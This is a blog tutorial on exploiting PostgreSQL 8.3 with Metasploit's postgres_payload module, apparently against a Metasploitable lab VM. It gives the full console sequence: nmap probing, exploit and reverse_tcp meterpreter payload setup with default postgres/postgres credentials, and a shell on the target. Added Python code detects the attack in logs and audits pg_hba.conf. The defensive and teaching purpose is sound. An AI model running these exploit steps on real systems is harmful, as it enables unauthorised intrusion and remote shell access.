Metasploit in Practice: PostgreSQL Code Execution

Author: DreamsonMa | Published 2019-07-14 13:29, read 57 times

    Introduction to PostgreSQL

    PostgreSQL is an object-relational database management system (ORDBMS) based on POSTGRES version 4.2, which was developed by the computer science department of the University of California, Berkeley, and has since been renamed PostgreSQL. PostgreSQL supports most of the SQL standard and provides many other modern features: complex queries, foreign keys, triggers, views, transactional integrity and MVCC. It can also be extended in many ways, for example by adding new data types, functions, operators, aggregate functions and index methods. PostgreSQL is free to use, modify and distribute, whether for private, commercial or academic purposes. https://www.postgresql.org/

    Probing the target PostgreSQL server

    Use nmap -sV -p 5432 <IP address> to probe the target's PostgreSQL version.

    ➜  ~ nmap -sV 10.0.2.5 | grep sql
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    

    Exploiting PostgreSQL code execution

    Use the PostgreSQL code-execution module in msf to obtain a reverse shell.

    1. Start the msfconsole console

    ➜  ~ msfconsole
    [-] ***rting the Metasploit Framework console...-
    [-] * WARNING: No database support: No database YAML file
    [-] ***
                                                      
    
     ______________________________________________________________________________
    |                                                                              |
    |                   METASPLOIT CYBER MISSILE COMMAND V5                        |
    |______________________________________________________________________________|
          \                                  /                      /
           \     .                          /                      /            x
            \                              /                      /
             \                            /          +           /
              \            +             /                      /
               *                        /                      /
                                       /      .               /
        X                             /                      /            X
                                     /                     ###
                                    /                     # % #
                                   /                       ###
                          .       /
         .                       /      .            *           .
                                /
                               *
                      +                       *
    
                                           ^
    ####      __     __     __          #######         __     __     __        ####
    ####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
    ################################################################################
    ################################################################################
    # WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
    ################################################################################
                                                               https://metasploit.com
    
    
           =[ metasploit v5.0.2-dev                           ]
    + -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
    + -- --=[ 541 payloads - 44 encoders - 10 nops            ]
    + -- --=[ 2 evasion                                       ]
    + -- --=[ ** This is Metasploit 5 development branch **   ]
    

    2. Search for PostgreSQL exploit modules

    msf5 > search postgresql
    
    Matching Modules
    ================
    
       Name                                                       Disclosure Date  Rank       Check  Description
       ----                                                       ---------------  ----       -----  -----------
       auxiliary/admin/http/manageengine_pmp_privesc              2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
       auxiliary/admin/http/rails_devise_pass_reset               2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
       auxiliary/admin/postgres/postgres_readfile                                  normal     No     PostgreSQL Server Generic Query
       auxiliary/admin/postgres/postgres_sql                                       normal     No     PostgreSQL Server Generic Query
       auxiliary/scanner/postgres/postgres_dbname_flag_injection                   normal     Yes    PostgreSQL Database Name Command Line Flag Injection
       auxiliary/scanner/postgres/postgres_login                                   normal     Yes    PostgreSQL Login Utility
       auxiliary/scanner/postgres/postgres_version                                 normal     Yes    PostgreSQL Version Probe
       auxiliary/server/capture/postgresql                                         normal     No     Authentication Capture: PostgreSQL
       exploit/linux/postgres/postgres_payload                    2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
       exploit/multi/http/manage_engine_dc_pmp_sqli               2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
       exploit/multi/postgres/postgres_createlang                 2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
       exploit/windows/postgres/postgres_payload                  2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
       post/linux/gather/enum_users_history                                        normal     No     Linux Gather User History
    

    3. Use exploit/linux/postgres/postgres_payload

    msf5 > use exploit/linux/postgres/postgres_payload
    msf5 exploit(linux/postgres/postgres_payload) > set rhosts 10.0.2.5
    rhosts => 10.0.2.5
    

    4. Choose a payload

    msf5 exploit(linux/postgres/postgres_payload) > show payloads
    
    Compatible Payloads
    ===================
    
       Name                                      Disclosure Date  Rank    Check  Description
       ----                                      ---------------  ----    -----  -----------
       generic/custom                                             normal  No     Custom Payload
       generic/debug_trap                                         normal  No     Generic x86 Debug Trap
       generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
       generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
       generic/tight_loop                                         normal  No     Generic x86 Tight Loop
       linux/x86/chmod                                            normal  No     Linux Chmod
       linux/x86/exec                                             normal  No     Linux Execute Command
       linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
       linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
       linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
       linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
       linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
       linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
       linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
       linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
       linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
       linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
       linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
       linux/x86/read_file                                        normal  No     Linux Read File
       linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
       linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
       linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
       linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
       linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
       linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
       linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
       linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
       linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
       linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
       linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
       linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
       linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
       linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)
    
    msf5 exploit(linux/postgres/postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf5 exploit(linux/postgres/postgres_payload) > set lhost 10.0.2.12
    lhost => 10.0.2.12
    

    5. Check the option settings

    msf5 exploit(linux/postgres/postgres_payload) > show options
    
    Module options (exploit/linux/postgres/postgres_payload):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       DATABASE  template1        yes       The database to authenticate against
       PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
       RHOSTS    10.0.2.5         yes       The target address range or CIDR identifier
       RPORT     5432             yes       The target port
       USERNAME  postgres         yes       The username to authenticate as
       VERBOSE   false            no        Enable verbose output
    
    
    Payload options (linux/x86/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  10.0.2.12        yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Linux x86
    

    6. Launch the exploit

    msf5 exploit(linux/postgres/postgres_payload) > run
    
    [*] Started reverse TCP handler on 10.0.2.12:4444 
    [*] 10.0.2.5:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
    [*] Uploaded as /tmp/WaGyEMSt.so, should be cleaned up automatically
    [*] Sending stage (914728 bytes) to 10.0.2.5
    [*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35547) at 2019-07-14 01:28:44 -0400
    
    meterpreter > sysinfo
    Computer     : metasploitable.localdomain
    OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
    Architecture : i686
    BuildTuple   : i486-linux-musl
    Meterpreter  : x86/linux
    meterpreter > shell
    Process 5163 created.
    Channel 1 created.
    id
    uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)
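
    From the defender's side, the run above leaves a clear trace: the module writes a shared library into /tmp (the "Uploaded as /tmp/WaGyEMSt.so" line) and registers it as a C-language function before calling it. The following added Python example, not part of the original post, scans PostgreSQL statement-log lines for exactly that pattern; the log lines, their format (log_statement = 'all') and the add_one example function are constructed for this example.

```python
import re
from typing import List, Tuple

# Constructed PostgreSQL server log lines (log_statement = 'all'), modelled on what the
# postgres_payload module does: write a shared library to /tmp, register it as a C-language
# function, call it. These lines are made up for this example, not taken from the post.
SAMPLE_LOG = """\
2019-07-14 01:28:40 EDT [5102] postgres@template1 LOG:  statement: select version()
2019-07-14 01:28:41 EDT [5102] postgres@template1 LOG:  statement: select lo_export(16401, '/tmp/WaGyEMSt.so')
2019-07-14 01:28:42 EDT [5102] postgres@template1 LOG:  statement: create or replace function pg_temp.WaGyEMSt() returns void as '/tmp/WaGyEMSt.so', 'WaGyEMSt' language C strict
2019-07-14 01:28:43 EDT [5102] postgres@template1 LOG:  statement: select pg_temp.WaGyEMSt()
2019-07-14 01:30:00 EDT [5110] app@shop LOG:  statement: select count(*) from orders
2019-07-14 01:31:00 EDT [5111] postgres@template1 LOG:  statement: create function add_one(int) returns int as '$libdir/add_one', 'add_one' language C strict
"""

# Locations a legitimate C-language function library is normally loaded from.
TRUSTED_LIB_PREFIXES = ("$libdir", "/usr/lib/postgresql")

# CREATE [OR REPLACE] FUNCTION ... AS '<library>' ... LANGUAGE C
C_FUNC_RE = re.compile(
    r"create\s+(?:or\s+replace\s+)?function\b.*?\bas\s+'([^']+)'.*?\blanguage\s+c\b",
    re.IGNORECASE)
# lo_export(<oid>, '<path>') writing a large object into a world-writable directory
LO_EXPORT_RE = re.compile(r"lo_export\s*\(\s*\d+\s*,\s*'((?:/tmp|/var/tmp|/dev/shm)/[^']+)'",
                          re.IGNORECASE)

def detect(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, rule, detail) for every suspicious statement in the log."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LO_EXPORT_RE.search(line)
        if m:
            hits.append((lineno, "lo_export_to_tmp", m.group(1)))
        m = C_FUNC_RE.search(line)
        if m and not m.group(1).startswith(TRUSTED_LIB_PREFIXES):
            hits.append((lineno, "c_function_from_untrusted_path", m.group(1)))
    return hits

if __name__ == "__main__":
    for lineno, rule, detail in detect(SAMPLE_LOG):
        print(f"line {lineno}: {rule}: {detail}")
```

    Both rules fire only for the two statements that stage and register the library; the legitimate $libdir function and ordinary queries are not reported.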
    

    Privilege escalation

    See: Metasploit in Practice: Telnet Brute-Forcing and Privilege Escalation

    Defence and remediation

    Defence: do not allow PostgreSQL connections from arbitrary IP addresses.
    Remediation: upgrade the version and apply a secure configuration (the run above authenticated with the default postgres/postgres credentials shown in the module options, so changing them is part of that configuration).
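
    The two defensive points above can be checked mechanically. This added Python example, not part of the original post, audits pg_hba.conf rules for the weak setting the post warns about (host rules that accept any address, or that use trust or plaintext password authentication) and places a hardened configuration beside it; both configurations are constructed for the example and are not the target's real ones.

```python
import ipaddress
from typing import List, Tuple
# Constructed pg_hba.conf contents for this example (not the target's real configuration).
# WEAK_HBA is the setting the post warns about: any address may connect, and the methods
# either skip authentication ('trust') or send the password in the clear ('password').
WEAK_HBA = """\
# TYPE  DATABASE  USER      ADDRESS        METHOD
local   all       postgres                 peer
host    all       all       0.0.0.0/0      password
host    all       all       ::/0           trust
"""
# HARDENED_HBA restricts each rule to the network that needs it and uses hashed passwords.
HARDENED_HBA = """\
# TYPE  DATABASE  USER      ADDRESS        METHOD
local   all       postgres                 peer
host    shop      app       10.0.2.0/24    md5
hostssl all       postgres  10.0.2.12/32   md5
"""

WEAK_METHODS = {"trust", "password"}
def is_unrestricted(address: str) -> bool:
    """True if ADDRESS admits every client: the keyword 'all', or a zero-length prefix."""
    if address == "all":
        return True
    try:
        return ipaddress.ip_network(address, strict=False).prefixlen == 0
    except ValueError:
        return False  # hostname, samehost/samenet: not evaluated here

def parse_host_rule(fields: List[str]) -> Tuple[str, str]:
    """Return (address, method); pg_hba accepts 'ADDR/PREFIX' or 'ADDR NETMASK' as two columns."""
    address, rest = fields[3], fields[4:]
    if rest and "/" not in address and rest[0].replace(".", "").isdigit():
        address, rest = f"{address}/{rest[0]}", rest[1:]
    return address, (rest[0] if rest else "")

def audit_hba(text: str) -> List[Tuple[int, str]]:
    """Return (line number, reason) for every host-type rule that is too permissive."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 5 or fields[0] not in ("host", "hostssl", "hostnossl"):
            continue
        address, method = parse_host_rule(fields)
        if is_unrestricted(address):
            findings.append((lineno, f"{fields[0]} rule accepts connections from any address ({address})"))
        if method in WEAK_METHODS:
            findings.append((lineno, f"authentication method '{method}' is weak"))
    return findings
```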

    Recommended roundup post: Exploitation Patterns Roundup

    Article link: https://www.haomeiwen.com/subject/vevbkctx.html